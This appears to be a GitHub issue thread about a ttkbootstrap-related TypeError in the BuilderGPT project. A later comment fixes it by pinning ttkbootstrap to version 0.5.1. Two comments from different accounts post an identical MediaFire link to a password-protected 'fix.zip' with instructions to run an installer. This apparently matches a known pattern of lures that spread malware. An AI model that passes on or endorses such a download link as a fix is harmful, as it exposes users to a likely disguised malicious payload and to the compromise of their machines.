### ISSUE TITLE
TypeError: Style.__new__() got an unexpected keyword argument 'themes_file'

### ISSUE THREAD

**Issue by doriandel** [CyniaAI/BuilderGPT#35]
I get this error after the command `python ui.py` (I also had to install mcschematic manually) : `TypeError: Style.__new__() got an unexpected keyword argument 'themes_file'`

The whole error message is : 

```
PS D:\Downloads\BuilderGPT-main> python ui.py
Traceback (most recent call last):
  File "D:\Downloads\BuilderGPT-main\ui.py", line 285, in <module>
    root = CreateQGUI(title="BuilderGPT",
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "D:\Downloads\BuilderGPT-main\cube_qgui\factory.py", line 52, in __init__
    self.root.style = Style(**QStyle.default)
                      ^^^^^^^^^^^^^^^^^^^^^^^
TypeError: Style.__new__() got an unexpected keyword argument 'themes_file'
```

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CortCannon** [comment]
I looked in their discord and found this `pip uninstall -y ttkbootstrap && pip install ttkbootstrap==0.5.1` and got the gui to work

**Comment by doriandel** [comment]
Oh it seems that it fixed the issue, thank you so much @CortCannon!
